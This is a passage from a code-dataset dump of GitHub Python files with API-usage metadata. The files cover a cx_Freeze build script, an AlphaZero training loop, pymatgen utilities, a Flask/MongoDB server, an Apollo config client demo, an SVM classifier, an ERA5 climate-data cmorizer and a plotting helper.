"line_number": 352, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 352, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 353, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 356, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 356, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "airflow.decorators.task", "line_number": 331, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 373, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", 
"line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 386, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 386, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 389, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 392, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 392, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 393, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 396, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 399, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 399, "usage_type": "name"}, {"api_name": "airflow.decorators.task", "line_number": 362, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 402, "usage_type": "call"}, {"api_name": "airflow.operators.python.get_current_context", "line_number": 419, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 412, "usage_type": "call"}, {"api_name": "airflow.decorators.dag", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "35974259075", "text": "import sys\n\nfrom cx_Freeze import setup, Executable\nimport PyQt4\nimport os\nimport PyQt4.uic\n\n\"\"\"\nutiliser : python setup.py build pour compiler.\n\"\"\"\n\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nimportationCode=[]\n\ndependances = [\"doc/\",\"dep/\",\"objects/\"]\n\nicone = [r\"dep/48.ico\"]\n\n#QWEB\nincludefiles = [\"rsc_rc.py\",(os.path.join(os.path.dirname(PyQt4.uic.__file__),\n\"widget-plugins\"), \"PyQt4.uic.widget-plugins\")]+importationCode+dependances\n#QWEB!\n\nincludes = [\"PyQt4.QtNetwork\", \"atexit\", \"numpy.core._methods\", \"numpy.lib.format\"]\nexcludes = []\npackages = [\"encodings\",\n \"OpenGL\",\n \"OpenGL.arrays\" # or just this one\n ]\n\nsetup(\n name = \"NAO_Simulator_2014\",\n author = \"Adrien Vernotte\",\n version = \"1.0.0\",\n description = \"Simulateur gratuit de NAO - Adrien Vernotte - LGPL v2.1\",\n executables = [Executable(\"NaoSimulator.py\", \n base = base,\n icon = icone[0]\n )\n ],\n options = {'build_exe': {'excludes':excludes,\n 'packages':packages,'include_files':includefiles,\n \"includes\":includes}}\n )\n", "repo_name": "AdrienVR/NaoSimulator", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.platform", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt4.uic", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cx_Freeze.setup", "line_number": 34, "usage_type": "call"}, {"api_name": "cx_Freeze.Executable", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "10692164870", "text": "import time\nfrom collections import deque\nimport random\n\nimport numpy as np\nimport torch\n\nfrom net import *\nfrom game import Game\nfrom data_loader import DataLoader\n\n\nclass Train(object):\n def __init__(self, use_cuda=USECUDA, lr=LR):\n\n if use_cuda:\n torch.cuda.manual_seed(1234)\n else:\n torch.manual_seed(1234)\n\n self.kl_targ = 0.02\n self.lr_multiplier = 1.\n self.use_cuda = use_cuda\n\n self.net = Net()\n self.eval_net = Net()\n if use_cuda:\n self.net = self.net.cuda()\n self.eval_net = self.eval_net.cuda()\n\n self.dl = DataLoader(use_cuda, MINIBATCH)\n self.sample_data = deque(maxlen=TRAINLEN)\n self.gen_optim(lr)\n self.entropy = AlphaEntropy()\n\n def sample(self, datas):\n for state, pi, reward in datas:\n c_state = state.copy()\n c_pi = pi.copy()\n for i in range(4):\n c_state = np.array([np.rot90(s, i) for s in c_state])\n c_pi = np.rot90(c_pi.reshape(SIZE, SIZE), i)\n self.sample_data.append([c_state, c_pi.flatten(), reward])\n\n c_state = np.array([np.fliplr(s) for s in c_state])\n c_pi = np.fliplr(c_pi)\n self.sample_data.append([c_state, c_pi.flatten(), reward])\n\n return len(datas)\n\n def gen_optim(self, lr):\n optim = torch.optim.Adam(self.net.parameters(), lr=lr, weight_decay=L2)\n self.optim = ScheduledOptim(optim, lr)\n\n def run(self):\n model_path = f\"model_{time.strftime('%Y%m%d%H%M', time.localtime())}.pt\"\n self.net.save_model(path=model_path)\n self.eval_net.load_model(path=model_path, cuda=self.use_cuda)\n\n for step in range(1, 1 + GAMETIMES):\n game = Game(self.net, self.eval_net)\n print(f\"Game - {step} | data length - {self.sample(game.play())}\")\n if len(self.sample_data) < MINIBATCH:\n continue\n\n states, pi, rewards = self.dl(self.sample_data)\n _, old_props = self.net(states)\n\n for _ in range(EPOCHS):\n self.optim.zero_grad()\n\n v, props = self.net(states)\n loss = self.entropy(props, v, pi, rewards)\n loss.backward()\n\n self.optim.step()\n\n _, new_props = self.net(states)\n kl = torch.mean(torch.sum(\n torch.exp(old_props) * (old_props - new_props), 1)).item()\n if kl > self.kl_targ * 4:\n break\n\n if kl > self.kl_targ * 2 and self.lr_multiplier > 0.1:\n self.lr_multiplier /= 1.5\n elif kl < self.kl_targ / 2 and self.lr_multiplier < 10:\n self.lr_multiplier *= 1.5\n\n self.optim.update_learning_rate(self.lr_multiplier)\n\n print(\n f\"kl - {kl} | lr_multiplier - {self.lr_multiplier} | loss - {loss}\")\n print(\"-\" * 100 + \"\\r\\n\")\n\n if step % CHECKOUT == 0:\n result = [0, 0, 0] # draw win loss\n for _ in range(EVALNUMS):\n game.reset()\n game.evaluate(result)\n\n if result[1] + result[2] == 0:\n rate = 0\n else:\n rate = result[1] / (result[1] + result[2])\n\n print(f\"step - {step} evaluation\")\n print(\n f\"win - {result[1]} | loss - {result[2]} | draw - {result[0]}\")\n\n # save or reload model\n if rate >= WINRATE:\n print(f\"new best model. rate - {rate}\")\n self.net.save_model(path=model_path)\n self.eval_net.load_model(\n path=model_path, cuda=self.use_cuda)\n else:\n print(f\"load last model. 
rate - {rate}\")\n self.net.load_model(path=model_path, cuda=self.use_cuda)\n\n print(\"-\" * 100 + \"\\r\\n\")\n\n\nif __name__ == \"__main__\":\n t = Train()\n t.run()\n", "repo_name": "ne7ermore/torch-light", "sub_path": "alpha-zero/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4085, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 526, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.cuda.manual_seed", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "data_loader.DataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 52, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 56, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 56, "usage_type": "call"}, {"api_name": "game.Game", "line_number": 61, "usage_type": "call"}, {"api_name": "game.play", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 80, "usage_type": "call"}, {"api_name": "game.reset", "line_number": 98, "usage_type": "call"}, {"api_name": "game.evaluate", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "28209633258", "text": "from pymatgen.ext.matproj import MPRester\nfrom pymatgen.electronic_structure.bandstructure import BandStructureSymmLine\n\nimport json as json\n\ndef save_structure(bs, filename):\n\t\"\"\"\n\tTakes pymatgen BandStructure/BandStructureSymmLine object and save to json\n\t\"\"\"\n\tif not filename.endswith(\".json\"):\n\t\tprint(\"File must be saved in json format\")\n\n\twith open(filename, \"w+\") as f:\n\t\tjson.dump(bs.as_dict(), f)\n\ndef load_structure(filename):\n\t\"\"\"\n\tLoad bandstructure from json and return either BandSructure or BandStructureSymmLine \n\t\"\"\"\n\tif not filename.endswith(\".json\"):\n\t\tprint(\"File must be saved in json format\")\n\n\twith open(filename, \"r\") as f:\n\t\td = json.load(f)\n\n\t\tbs = BandStructureSymmLine.from_dict(d)\n\t\t\n\treturn bs\n\n\nif __name__ == \"__main__\":\n\twith open(\"api_key.txt\") as f: API_KEY = f.readline()\n\n\tmpr = MPRester(API_KEY)\n\t\n\tbs_ZnO = mpr.get_bandstructure_by_material_id(\"mp-2133\")\n\tbs_SnO2 = mpr.get_bandstructure_by_material_id(\"mp-856\")\n\tbs_SiC = mpr.get_bandstructure_by_material_id(\"mp-11714\")\n\n\tsave_structure(bs_ZnO, \"data/ZnO.json\")\n\tsave_structure(bs_SnO2, \"data/SnO2.json\")\n\tsave_structure(bs_SiC, \"data/SiC.json\")\n\t\n\n\n\n\n", "repo_name": "hkve/SMN-summer-job", "sub_path": "MP/get_structure.py", "file_name": "get_structure.py", "file_ext": "py", "file_size_in_byte": 1144, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 
"dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dump", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pymatgen.electronic_structure.bandstructure.BandStructureSymmLine.from_dict", "line_number": 26, "usage_type": "call"}, {"api_name": "pymatgen.electronic_structure.bandstructure.BandStructureSymmLine", "line_number": 26, "usage_type": "name"}, {"api_name": "pymatgen.ext.matproj.MPRester", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "70404981925", "text": "from werkzeug.exceptions import HTTPException\nfrom flask_pymongo import PyMongo\nfrom flask import Flask, jsonify, request\n\nfrom game import api, jwt #, admin\n\n# ----- App init -----\napp = Flask(__name__)\njwt.keypair = jwt.set_keypair(jwt.read_keyfiles())\n\napp.config['MONGO_DBNAME'] = 'savo'\napp.config['MONGO_URI'] = 'mongodb://mongodb:27017/savo'\nmongo = PyMongo(app)\ndb = mongo.db\n\n# ----- Routes -----\napp.add_url_rule('/', 'index', api.index, methods=['GET', 'BREW'])\napp.add_url_rule('/user', 'user', api.user, defaults={ 'db': db, 'token': jwt.get() }, methods=['GET'])\napp.add_url_rule('/register', 'register', api.register, defaults={ 'db': db }, methods=['POST'])\napp.add_url_rule('/login', 'login', jwt.login, defaults={ 'db': db }, methods=['POST'])\napp.add_url_rule('/logout', 'logout', jwt.logout, methods=['GET', 'POST'])\n\n@app.errorhandler(Exception)\ndef handleError(err): # game/__init__.py do some funky lol in production?\n if isinstance(err, HTTPException):\n return err\n return 'Internal Server Error', 500\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8060)\n\n", "repo_name": "Ghost-Zephyr/savo", "sub_path": "server/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "game.jwt.keypair", "line_number": 9, "usage_type": "attribute"}, {"api_name": "game.jwt", "line_number": 9, "usage_type": "name"}, {"api_name": "game.jwt.set_keypair", "line_number": 9, "usage_type": "call"}, {"api_name": "game.jwt.read_keyfiles", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_pymongo.PyMongo", "line_number": 13, "usage_type": "call"}, {"api_name": "game.api.index", "line_number": 17, "usage_type": "attribute"}, {"api_name": "game.api", "line_number": 17, "usage_type": "name"}, {"api_name": "game.api.user", "line_number": 18, "usage_type": "attribute"}, {"api_name": "game.api", "line_number": 18, "usage_type": "name"}, {"api_name": "game.jwt.get", "line_number": 18, "usage_type": "call"}, {"api_name": "game.jwt", "line_number": 18, "usage_type": "name"}, {"api_name": "game.api.register", "line_number": 19, "usage_type": "attribute"}, {"api_name": "game.api", "line_number": 19, "usage_type": "name"}, {"api_name": "game.jwt.login", "line_number": 20, "usage_type": "attribute"}, {"api_name": "game.jwt", "line_number": 20, "usage_type": "name"}, {"api_name": "game.jwt.logout", "line_number": 21, "usage_type": "attribute"}, {"api_name": "game.jwt", "line_number": 21, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 25, "usage_type": "argument"}]} +{"seq_id": "73521105124", "text": "# coding=utf-8\n\nfrom __future__ import print_function\n\nimport time\nimport logging\nimport apyllo\n\n\ndef main():\n apyllo.set_logger(\n 'apyllo',\n 
logging.DEBUG,\n rotate_file_path='/tmp/apyllo.log',\n )\n client = apyllo.client(\n config_server_host=\"your-apollo-meta-service.com\",\n fallback_to_local=False,\n app_id=\"apyllo-demo\",\n namespaces=[\"application\", \"demo.yml\"],\n )\n\n # will blocking for seconds while do first-time polling.\n client.start()\n\n # do your work.\n # e.g. user could manually download ns config.\n # client.download(\"demo.yml\")\n\n print(\n \"got application key `demo` value: {}\".format(\n client.get_value(\"demo\", \"application\", \"NONE\")\n )\n )\n\n print(\n \"got demo.yml content: \\r\\n{}\".format(\n client.get_content(\"demo.yml\")\n )\n )\n\n client.stop()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Colstuwjx/apyllo", "sub_path": "examples/client_call.py", "file_name": "client_call.py", "file_ext": "py", "file_size_in_byte": 935, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "apyllo.set_logger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 13, "usage_type": "attribute"}, {"api_name": "apyllo.client", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "20632072550", "text": "\n# Importing packages\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\n\nbank_marketing_cleaned = pd.read_csv('/Users/sathu/Desktop/bank_marketing/data_clean/bank_marketing_data_cleaned.csv', index_col=None) # replace the path\n\n# dynamically identifying the independent features\nx_var = list(bank_marketing_cleaned.columns)\nx_var.remove(\"subscribed\")\n\n# Splitting the dataset into test and train sets 80:20 respectively\nX_train, X_test, y_train, y_test = train_test_split(bank_marketing_cleaned[x_var], bank_marketing_cleaned[\"subscribed\"] ,test_size = 0.2, random_state = 100)\n\nprint(\"Data has been split into train and test sets\")\n\n# Training the model on train set\nmodel = SVC()\nmodel.fit(X_train, y_train)\n\nprint(\"Model trained! 
Results below : \\n\\n\")\n \n# Printing prediction results\npredictions = model.predict(X_test)\nprint(classification_report(y_test, predictions))\nprint(\"\\n\\n\")\nprint(\"Performing a Grid search to identify best set of parameters\")\n\n# defining parameter range for GridSearch\nparam_grid = {'C': [0.1, 1, 10, 100, 1000], \n 'gamma': [1, 0.1, 0.01, 0.001, 0.0001],\n 'kernel': ['poly','rbf']} \n \ngrid = GridSearchCV(SVC(), param_grid, refit = True, verbose = 3)\n \n# Fitting the model for grid search\ngrid.fit(X_train, y_train)", "repo_name": "sathu95/bank_marketing_term_deposit_prediction", "sub_path": "bank_marketing/src/3_data_modeling.py", "file_name": "3_data_modeling.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "12507748085", "text": "\"\"\"Cmorizer\n\nERA5 cmorizer is mostly based on the official ECMWF documentation of converting GRIB to NetCDF:\n\nhttps://confluence.ecmwf.int/display/OIFS/How+to+convert+GRIB+to+netCDF\n\n\"\"\"\n\nimport os\nimport subprocess\nfrom os import path as op\nfrom pprint import pprint\nfrom warnings import warn\n\nimport pandas as pd\nimport xarray as xr\nfrom cdo import Cdo\n\n# path and file templates at DKRZ\n# see https://docs.dkrz.de/doc/dataservices/finding_and_accessing_data/era_data/#file-and-directory-names\npath_template = (\n \"/pool/data/ERA5/{era_id}/{level_type}/{dataType}/{frequency}/{code:03d}\"\n)\nfile_template = \"{era_id}{level_type}{typeid}_{frequency}_{date}_{code:03d}.grb\"\n\n\ndef get_output_filename(date, expid, path=None):\n if path is None:\n path = \"./\"\n date = pd.to_datetime(date).strftime(\"%Y%m%d%H\")\n return op.join(path, f\"g{expid}a{date}.nc\")\n\n\ndef params_by_code(params, code):\n for k, v in params.items():\n c = v.get(\"code\", -999)\n if code == c:\n return v | {\"rename\": k}\n return None\n\n\ndef renames_by_code(ds, params):\n renames = {}\n for var in ds.data_vars:\n code = ds[var].attrs.get(\"code\", -999)\n param = params_by_code(params, code)\n if param:\n renames[var] = param[\"rename\"]\n return renames\n\n\ndef get_params(config):\n defaults = config.get(\"defaults\", {})\n return {k: defaults | v for k, v in config[\"parameters\"].items()}\n\n\ndef check_search(result):\n if len(result) == 0:\n warn(f\"nothing found: {len(result)}\")\n return None\n if len(result) > 1:\n pass\n # warn(f\"result not unique: {len(result)}, {result}\")\n return result.iloc[0].path\n\n\ndef get_file_from_intake(cat, params, date=None):\n \"\"\"get filename entry from intake catalog\"\"\"\n if date is not None:\n date = pd.to_datetime(date).strftime(\"%Y-%m-%d\")\n freq = params.get(\"frequency\", None)\n if freq is None or freq == \"invariant\":\n date = \"INVARIANT\"\n return cat.search(**params, validation_date=date)\n\n\ndef get_files_from_intake(cat, params, date=None):\n files = {}\n for k, v in params.items():\n f = check_search(get_file_from_intake(cat, params=v, 
date=date).df)\n if not f:\n warn(f\"no result for {k} --> params: {v}\")\n files[k] = f\n return files\n\n\ndef get_file_from_template(date, era_id, frequency, dataType, code, level_type):\n \"\"\"Derive filename from filename template\n\n Derives filename according to https://docs.dkrz.de/doc/dataservices/finding_and_accessing_data/era_data/#file-and-directory-names\n\n \"\"\"\n lt = {\n \"model_level\": \"ml\",\n \"surface\": \"sf\",\n }\n freqs = {\n \"hourly\": \"1H\",\n \"daily\": \"1D\",\n \"monthly\": \"1M\",\n \"invariant\": \"IV\",\n }\n typeids = {\n \"an\": \"00\",\n \"fc\": \"12\",\n }\n\n level_type = lt.get(level_type, level_type)\n frequency = freqs.get(frequency, frequency)\n typeid = typeids.get(dataType, dataType)\n if frequency == \"IV\":\n date = \"INVARIANT\"\n else:\n date = pd.to_datetime(date).strftime(\"%Y-%m-%d\")\n return op.join(path_template, file_template).format(\n date=date,\n era_id=era_id,\n frequency=frequency,\n dataType=dataType,\n code=code,\n level_type=level_type,\n typeid=typeid,\n )\n\n\ndef get_files_from_template(params, date):\n files = {}\n for k, v in params.items():\n f = get_file_from_template(date=date, **v)\n if not f:\n warn(f\"no result for {k} --> params: {v}\")\n files[k] = f\n return files\n\n\nclass ERA5:\n \"\"\"\n Class for cmorizing original ERA5 GRIB data.\n\n Notes\n -----\n The cmorizer class mostly works with the intake catalog provided by DKRZ.\n\n References\n ----------\n Please refer to the DKRZ data pool documentation: https://docs.dkrz.de/doc/dataservices/finding_and_accessing_data/era_data\n\n \"\"\"\n\n dynamic = [\"ta\", \"hus\", \"ps\", \"tos\", \"sic\", \"clw\", \"snd\"]\n wind = [\"svo\", \"sd\"]\n fx = [\"orog\", \"sftlf\"]\n chunks = {}\n options = \"-f nc4\"\n\n def __init__(self, params, cat=None, gridfile=None, scratch=None):\n if isinstance(cat, str):\n import intake\n\n self.cat = intake.open_esm_datastore(cat)\n else:\n self.cat = cat\n if scratch is None:\n scratch = os.environ.get(\"SCRATCH\", \"./\")\n self.scratch = scratch\n self.params = params\n self.gridfile = gridfile\n self.cdo = Cdo(tempdir=scratch)\n\n def _get_files(self, date):\n if self.cat:\n return get_files_from_intake(\n self.cat,\n {\n k: v\n for k, v in self.params.items()\n if k in self.dynamic + self.fx + self.wind\n },\n date,\n )\n else:\n return get_files_from_template(\n date=date,\n params={\n k: v\n for k, v in self.params.items()\n if k in self.dynamic + self.fx + self.wind\n },\n )\n\n def _seldate(self, filename, date):\n return f\"--seldate,{date} {filename}\"\n # return self.cdo.seldate(date, input=filename)\n\n def _seldates(self, filenames, date):\n return {\n v: (\n self._seldate(f, date)\n if self.params[v].get(\"frequency\") != \"invariant\"\n else f\n )\n for v, f in filenames.items()\n }\n\n def _to_regulars(self, filenames, gridtypes):\n return {\n v: self._to_regular(f, gridtype=gridtypes[v], setname=v)\n for v, f in filenames.items()\n if v in self.dynamic + self.fx\n }\n\n def _get_gridtypes(self, filenames):\n return {v: self._gridtype(f) for v, f in filenames.items()}\n\n def _to_netcdf(self, filenames):\n pass\n\n def _open_dsets(self, filenames):\n dsets = {}\n for v, f in filenames.items():\n ds = xr.open_dataset(f, chunks=self.chunks)\n if v in self.fx:\n # squeeze out time\n ds = ds.squeeze(drop=True)\n dsets[v] = ds\n return dsets\n\n def _griddes(self, filename):\n griddes = self.cdo.griddes(input=filename)\n return {\n entry.split(\"=\")[0].strip(): entry.split(\"=\")[1].strip()\n for entry in 
griddes\n if \"=\" in entry\n }\n\n def _gridtype(self, filename):\n return self._griddes(filename)[\"gridtype\"]\n\n def _to_regular(self, filename, gridtype=None, setname=\"\", table=\"ecmwf\"):\n \"\"\"converts ecmwf spectral grib data to regular gaussian netcdf.\n\n cdo is used to convert ecmwf grid data to netcdf depending on the gridtype:\n For 'gaussian_reduced': cdo setgridtype,regular\n 'spectral' : cdo sp2gpl\n\n This follows the recommendation from the ECMWF Era5 Documentation.\n We also invert the latitudes to stick with cmor standard.\n\n \"\"\"\n if table is None:\n table = \"\"\n # from cdo import Cdo\n # cdo = Cdo(tempdir=scratch)\n if gridtype is None:\n gridtype = self._gridtype(filename)\n # options = f\"-f nc4 -t {table}\"\n if setname:\n setname = f\"--setname,{setname}\" # {filename}\"\n if gridtype == \"gaussian_reduced\":\n gaussian = \"--setgridtype,regular\"\n elif gridtype == \"spectral\":\n gaussian = \"--sp2gpl\"\n elif gridtype == \"gaussian\":\n gaussian = \"\"\n else:\n raise Exception(\n \"unknown grid type for conversion to regular grid: {}\".format(gridtype)\n )\n command = f\"{setname} {gaussian} {filename}\"\n return command\n\n def _compute_wind(self, vort, div):\n \"\"\"compute wind from vorticity and divergence\"\"\"\n return f\"--chname,u,ua,v,va --dv2uvl --merge {vort} {div}\"\n\n def gfile(self, date, path=None, expid=None, filename=None):\n \"\"\"Create an ERA5 gfile dataset.\n\n Main function to convert ERA5 grib data to a regular gaussian Dataset\n containing all variables required for REMO preprocessing.\n\n Parameters\n ----------\n date : date in ISO 8601 format.\n Date for which the variables should be converted.\n output: str\n Name of output file.\n path: str\n Output path for the gfile.\n expid: str\n Experiment id for the filenaming template.\n filename: str\n Filename including path for the output filename. 
If not provided,\n the filename will be created automatically from path and expid.\n\n Returns\n -------\n Output filename.\n\n \"\"\"\n if expid is None:\n expid = \"000000\"\n if filename is None:\n filename = get_output_filename(date, expid, path)\n print(f\"output filename: {filename}\")\n # gridfile = \"/work/ch0636/g300046/remo/era5-cmor/notebooks/grid.txt\"\n\n print(\"getting files...\")\n files = self._get_files(date)\n pprint(f\"using files: \\n{files}\")\n print(\"getting gridtypes...\")\n gridtypes = self._get_gridtypes(files)\n print(\"selecting dates...\")\n seldates = self._seldates(files, date)\n print(\"convert to regular grid...\")\n regulars = self._to_regulars(seldates, gridtypes)\n print(\"computing wind...\")\n wind = self._compute_wind(seldates[\"svo\"], seldates[\"sd\"])\n\n merge = f\"--setgrid,{self.gridfile} --merge \" + \" \".join(\n list(regulars.values()) + [wind]\n )\n call = f\"cdo {self.options} invertlat {merge} {filename}\"\n print(f\"execute: {call}\")\n\n subprocess.run(\n call.split(),\n check=True,\n shell=False,\n )\n # stdout, stderr = process.communicate()\n\n return filename\n # return self.cdo.invertlat(options=self.options, input=merge, output=filename)\n", "repo_name": "remo-rcm/pyremo", "sub_path": "pyremo/preproc/era5.py", "file_name": "era5.py", "file_ext": "py", "file_size_in_byte": 10081, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.to_datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 70, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 131, "usage_type": "call"}, {"api_name": "intake.open_esm_datastore", "line_number": 160, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 164, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 164, "usage_type": "attribute"}, {"api_name": "cdo.Cdo", "line_number": 168, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 221, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 310, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 326, "usage_type": "call"}]} +{"seq_id": "37312593253", "text": "import matplotlib.pyplot as plt\n\n\ndef plot_simulation(time_ms, vm, n, m, h, inj_array, save_to=None, title=''):\n figure = plt.figure(figsize=(15, 10))\n ax1 = plt.subplot(511)\n ax1.set_title(title, fontSize=20)\n ax1.plot(time_ms, vm)\n ax1.set_ylabel(\"V (mV)\")\n ax1.set_xlabel(\"time (ms)\")\n\n ax2 = plt.subplot(512)\n ax2.plot(time_ms, n, color='red')\n ax2.set_ylabel(\"n\")\n ax2.set_xlabel(\"time (ms)\")\n\n ax3 = plt.subplot(513)\n ax3.plot(time_ms, m, color='green')\n ax3.set_ylabel(\"m\")\n ax3.set_xlabel(\"time (ms)\")\n\n ax4 = plt.subplot(514)\n ax4.plot(time_ms, h, color='black')\n ax4.set_ylabel(\"h\")\n ax4.set_xlabel(\"time (ms)\")\n\n ax5 = plt.subplot(515)\n ax5.plot(time_ms, inj_array)\n ax5.set_ylabel(\"inj current (µA/mm²)\")\n ax5.set_xlabel(\"time 
(ms)\")\n\n if save_to is not None:\n plt.savefig(save_to)\n\n return figure\n", "repo_name": "V3RGANz/cncourse2020", "sub_path": "assignment1/visualization.py", "file_name": "visualization.py", "file_ext": "py", "file_size_in_byte": 891, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 6, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", 